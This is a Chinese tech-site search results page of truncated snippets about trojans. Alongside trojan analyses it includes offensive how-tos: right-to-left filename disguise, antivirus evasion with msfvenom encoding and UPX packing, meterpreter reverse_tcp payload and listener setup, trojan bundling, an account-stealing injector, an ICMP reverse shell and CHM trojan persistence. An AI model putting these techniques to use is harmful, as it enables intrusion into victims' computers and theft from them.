首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

来自云端木马:“百家”木马集团分析

0×00背景 近日,腾讯反病毒实验室拦截到一批伪装成客户通知单木马,该木马会根据自身文件名不同而进行多种不同恶意行为,经测试,目前国内多款杀毒软件尚不能查杀该病毒,多个木马变种MD5被多款安全软件加入到白名单中...该木马近期持续活跃,传播量上万,该木马有以下特点: 1)通过文件名控制自身行为,根据不同文件名有着多达六十多种不同行为。...5)经过对木马行为分析,结合数据库中实际数据,我们得知配置中比较重要字段意义,将其列举如下: 配置字段 功能 id 木马id jm 解密密钥 daxiao 文件大小 fanghi 要创建傀儡进程...2、PlayLoad分析 该木马根据不同id,可以下载执行多大60多中不同PlayLoad,经抽样分析,这些不同PlayLoad大多为Gh0st远程控制木马,每个木马有着不同C&C服务器,应该是不同使用者所使用...0×03后记: 经过对木马加载器详细分析和配置信息猜测解读,做出如下图猜测,木马作者负责木马免杀(同一个文件),并通过SQL Server上配置信息来管理和销售木马,每卖出一个木马作者便为牧马人开立一个帐号

1.3K70
您找到你想要的搜索结果了吗?
是的
没有找到

木马伪装-后门木马变形记

在做安全测试时,种个后门养个马在所难免,常见后门有exe、bat、scr、vb等格式,可是凡是有点安全意识都不会去下载、双击打开,那给后门穿件衣裳可好。...导入成功后左边导航栏会出现version info文件夹 点击Add Binary or Image Resourc(下图标红功能),弹出如下对话框,selectfile选择之前生成.ico文件...最后点击保存,这个时候我们后门已经穿好马夹,如下 ?...点击文件进行重命名,在jpg前插入unicode字符,其实插入是个由右向左显示unicode字符 ? 插入完成后见证奇迹时候到了,像不像个图片呀,你还会以为他是个后门么? ?...最后:伪装木马虽然骗了我们眼睛,但是骗不过杀毒软件,只有免杀木马穿上这件马夹才能碰撞出更激情火花,实现华丽转身。

2.6K20

木马免杀方式_木马入侵常见方法

大家好,又见面了,我是你们朋友全栈君。 前言 免杀,又叫免杀毒技术,是反病毒,反间谍对立面,是一种能使病毒或木马免于被杀毒软件查杀软件。...它除了使病毒木马免于被查杀外,还可以扩增病毒木马功能,改变病毒木马行为。免杀基本特征是破坏特征,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。...1、裸奔马尝试 意为不做任何免杀处理木马 1、使用msfmsfvenom生成木马文件,生成一个裸奔马,命名为 weixin.exe吧 命令: msfvenom -p windows/meterpreter...使用多种反病毒引擎对您所上传文件进行检测, 以判断文件是否被病毒, 蠕虫, 木马, 以及各类恶意软件感染。....exe合成马,同时对木马进行x86/shikata_ga_nai进行多次编码方式进行免杀处理。

1.7K40

浅谈木马

浅谈木马远控 在听过某网安教育关于浅谈公开课后,结合本人学过东西,以及自己实践过经历。在此分享下木马对我们影响。...(2)服务器端 服务器端程序 服务器端程序即木马程序,它隐藏安装在目标主机上,目标主机也称为肉鸡。 二、制作简易木马 此处我们利用msfvenom制作木马程序。...三、木马危害 由于本文探讨木马远控,这里就暂时省略文件上传、命令执行下载木马等方式将木马传入目标主机讨论。...木马捆绑: 制作自解压木马(准备一个木马、一个图片、一个压缩软件即可) 攻击者可以制作一个自解压木马,诱导目标解压压缩包。在目标解压压缩文件同时会运行压缩文件里木马程序,从而被控制。...(当你从一些奇怪地方下载了一些奇怪压缩包时候,可能这个压缩包里面就捆绑了木马,当你一解压,它会自动运行里面的木马程序。) 可能很多时候我们杀毒软件够强大,可以检测到捆绑了木马压缩文件。

24220

黑客常用木马工具

大家经常会听到“木马”一词。究竟木马是什么东西呢?这篇文章里我会向大家介绍“特洛伊木马”、“特洛伊木马使用以及特洛伊木马防范等。 木马,全称为:特洛伊木马(Trojan Horse)。...而木马里面却藏着最强悍勇士!最后等时间一到,木马勇士全部冲出来把敌人打败了! 这就是后来有名木马计”。—— 把预谋功能隐藏在公开功能里,掩饰真正企图。...至于黑客程序里特洛伊木马和故事里特洛伊木马差不多。 黑客程序里特洛伊木马有以下特点: (1)主程序有两个,一个是服务端,另一个是控制端。 (2)服务端需要在主机执行。...本文运用端口扫描程序,在网络上寻找木马冰河服务器端,从而达到对该用户实施入欺电脑目的。...点击“自动卸载”,就将冰河服务器端清除了。 ? 方法二: 冰河 v1.1 1、打开注册表“Regedit.exe”。(可以在“开始”——“运行”里输入“regedit”。)

1.5K30

木马程序制作

0x0:想必大家都听说过计算机病毒或者木马吧,看着电影里面的黑客敲几下键盘就能控制你系统,窃取你隐私资料,执行任意命令,很炫酷吧,其实这种技术不难实现,接下来我就带领大家来玩一玩木马制作....LHOST设置为自己IP,LPORT设置为自己端口,用于回连....是输出加入PAYLOAD并进行过编码木马文件. 0x02:生成木马文件如图1-2. 0x03:进入MSF后,我们打开监听模块....选择好PAYLOAD后设置目标回连IP和端口即可. 0x04:把木马文件复制到目标机器上并执行. 0x05:查看监听状态,会发现有一个Meterpreter回连会话,这是你就可以使用migrate...End:这次渗透测试还是很简单,蛋疼是看《Metasploit渗透测试魔鬼训练营》木马程序制作时一直不成功,研究了几天后偶然在国外技术文章中收获了点灵感————不使用-K参数,虽然生成木马程序不能拥有源程序完整功能

81230

Kronos银行木马被发现,疑似新版Osiris木马

根据Proofpoint安全研究人员说法,新版本Kronos银行木马正蠢蠢欲动,研究人员证实,最近三次宣传这个旧木马翻新版本在2014年经历了鼎盛时期。...相似之处包括2018版本使用相同Windows API散列技术和散列,相同字符串加密技术,相同C&C加密机制,相同C&C协议和加密,相同webinject格式(Zeus格式)以及类似的C&C面板文件布局...Kronos 2018版可能是新版Osiris木马 研究人员说,与此同时,这种新Kronos变种开始出现在他们雷达上,一名恶意软件作者开始在黑客论坛上宣传一种新银行木马,他称之为Osiris。...Proofpoint研究人员并未设法获得这种新Osiris恶意软件样本,但他们表示该宣传广告很好地描述了Kronos 2018版本。...最大线索是这个新特洛伊木马作者声称他木马只有350 KB大小,接近于早期Kronos 2018版样本——研究人员4月份发现(351 KB)大小。

1.3K50

挖矿木马详解

攻击者通过各种手段将挖矿程序植入受害者计算机中,在受害者不知情情况下利用其计算机云算力进行挖矿,从而获取利益,这类非法植入用户计算机挖矿程序就是挖矿木马。 挖矿木马,挖是啥?...由于比特币成功,许多基于区块链技术数字货币纷纷问世,如以太币、达世币等;从深信服安全团队接到挖矿木马案例来看,门罗币是最受挖矿木马青睐数字货币,主要有如下几个原因: 1....挖矿木马自查 挖矿木马自查 发现挖矿 CPU使用率 通常对挖矿木马感知,主要表现在主机使用感上,在主机正常运行情况下,突然变得卡顿,并且CPU使用率高于正常使用时数值或达到了100%: 感知产品...当然,仅从卡顿和CPU使用率来判断是否中了挖矿木马是不准确,从安全产品上能够更加准确直观发现挖矿木马。...,通常该数据格式就是挖矿木马与矿池通信格式: 使用威胁情报查询该IP,即可确认中了挖矿木马: 如果是使用了杀毒软件,定期进行全盘扫描也能够发现挖矿木马,通常会扫描出Miner或永恒之蓝漏洞利用工具包文件

11.8K61

木马盗号《一》

这一节主要给大家分享是黑客是如何利用木马进行盗号。 久前看了一些安全方面的书籍。在看完了《计算机病毒揭秘与对抗》---王倍昌书 以后,打算找个目标试试手。...我找目标是WeGame,其实我也可以自己写一个模拟登陆小程序,然后作为这次实验对象。但是这样就不太真实,自己写小程序显然没有防御措施,模拟不了真实环境,体会不到写盗号木马乐趣-。-!...我会给出相关链接提供"传送门",使有需要读者可以参考。由于本次只是木马主要功能原理介绍,所以我并不介绍木马怎么隐藏、怎么绕过360防御(本文木马很容易被杀毒软件查杀)进行免杀。(-。...原理: 首先介绍一下一般病毒运行方式,我们选一种用来写盗号木马。 ? ? ? 上面分别简单介绍了病毒注入、自启动和感染方式,想要详细了解具体细节读者可以阅读我开头介绍书籍。...我猜想,一定是我模拟不够真实。于是我打算从更底层驱动级别模拟开始,但是这样木马隐蔽性就下降了很多了,因为我们必须加载驱动了,没办法只可以这样了。

1.5K30

木马盗号《三》

背景: 上一篇 WeGame盗号木马之旅(二) 我们实现了键盘按键模拟驱动开发,这篇我们实现下具体注入代码编写。 目标: 具体注入代码编写。实现账号获取和密码获取。...这一篇我们写注入代码就是上面橙色框内代码,后面我们会写InfectiveVirus.exe代码,用于实现怎么把这次实现代码写到目标EXE,并且让他像正常工作一样,但是关键时刻会向服务器发送信息。...这样程序会在正式执行自己代码前首先运行我们代码,然后我在jmp 到原来入口点执行本来程序代码就OK了 O(∩_∩)O。...至于这些代码注入和入口点修改会在开发 InfectiveVirus.exe是介绍,这些是他工作。 在说明一点,开发注入代码,最好直接用汇编语言写。...如图是我写好二进制代码char 数组: ? 其实就是对应汇编指令机器码。 还有一点说明-。-。。。。

1.5K20

木马植入肉机方法

如果我们要想把自己木马植入到别人计算机上,首先就要伪装好自己。一般来讲,木马主要有两种隐藏手段: 一....这种程序伪装成正常程序,实质是个木马伪装成,在木马代码前段会完成自我安装与隐藏过程, 最后显示一个错误信息,骗过用户。 二....鉴于木马危害性,很多人对木马知识还是有一定了解,这对木马传播起了一定抑制作用,这是木 马设计者所不愿见到,因此他们开发了多种功能来伪装木马,以达到降低用户警觉,欺骗用户目的。...论坛上发链接 在可以上传附件论坛上传捆绑好木马(如将木马捆绑在图片上传),然后把链接发给想要攻击目标肉 机主人,诱惑他点击那个链接。 10....网页木马法 在自己网页上捆绑木马,再在Q Q 上邀请想要攻击目标网友去访问,轻松给他种上你配置木马

81250

工具使用 | Msfvenonm生成木马

目录 Msfvenom 生成exe木马 在前一篇文章中我讲了什么是Meterpreter,并且讲解了Meterpreter用法。...传送门——>Metasploit之Meterpreter 今天我要讲的是我们用Msfvenom制作一个木马,发送给其他主机,只要其他主机运行了该木马,就会自动连接到我们主机,并且建立一条TCP连接。...位calc.exe,生成32位test.exe文件 利用 upx 加壳 upx -9 test.exe -k -o test2.exe 下面介绍一些生成其他格式木马!...msf exploit(handler) > set payload windows/meterpreter/reverse_tcp #设置payload,不同木马设置不同payload msf...如图,我们成功拿到了其他主机shell 对于这个木马,如果我们在获取到某主机shell后,想要在目标主机建立持续性后门,我们可以将该木马放到目标主机开机启动项中,那样,只要该主机启动后,我们就可以连接到该主机了

1.4K10

教你学木马攻防 | 隧道木马 | ICMP反弹shell

前言 前文回顾: 教你学木马攻防 | 隧道木马 | 第一课 在上一篇文章中,我们讲解了木马中常用端口转发技术,这一节讲解一下木马通信协议中ICMP协议,并通过ICMP实现一个反弹shell。...当年网费还是挺贵,大学生上个网还是容易“破产”呀。...当你网费耗尽后,网管服务器就会拦截你网络请求,但是只拦截了TCP和UDP协议,放过了ICMP协议,ping ip还是可以,于是就开始琢磨利用icmp隧道将访问转发到自己一台放置在公网中代理,利用代理中转访问公网...48bytes相对比较复杂,每次内容部分不一样,其中一样是末尾23bytes,内容为!”...第四节 最后 推荐阅读: Python RASP 工程化:一次入侵思考 教你学木马攻防 | 隧道木马 | 第一课 一个Python开源项目-哈勃沙箱源码剖析(下)

3.9K30

利用win消息机制木马

作者丨黑蛋一、木马简述文件名称9dfd124ca235aa3d8434afbb0167581ff2f35ad0ab142ee5bdff0ff29b64d542文件类型(Magic)PE32 executable...操作系统win7x86三、行为分析打开火绒剑,打开监视,然后打开木马:运行一会,木马本体就消失了。...工具窗口具有短于普通标题栏标题栏和使用较小字体绘制窗口标题。 工具窗口不会显示在任务栏中,也不会显示在用户按下 Alt+TAB 时出现对话框中。...与时俱进,不写流程图,接下来我们查看参数结构体第三位:在这里下断点,这里应该就是处理消息地方,F9走到CreateWindowExW,然后F8,成功断在了刚才下断点地方:而此时图标还没生成,从这里调试...这就是这个木马主要功能。

41500

CHM木马分析与利用

偶然获得了一个过X60启动CHM木马,由于从未接触过此类木马,遂进行一番学习,并通过木马所带来启发再创造。 ?...一、木马行为分析 CHM文件是经过压缩各类资源集合,使用7z解压软件直接打开木马样本,如图所示,可以发现CHM文件内部包含一个说明.html文件。 ?...C:\\Users\\Public\\Documents\\Perflog.exe">'; 结合我之前对CHM木马行为分析基本可以判断...CHM木马执行流程: 1.利用WINRAR解压自身到C:\Users\Public\Documents 2.执行CMD命令注册1.reg 添加启动 3.打开Perflog.exe 在WIN7虚拟机打开样本可以看到解压出了如下文件...由于我不懂逆向工程 但是可以做出如下推测 1.perflog.exe是具有有效签名白文件启动时会调用edudll.dll 2.edudll.dll是黑dll 以上这应该是个一个典型白加黑木马 水平有限就不去分析这个

2.5K30
领券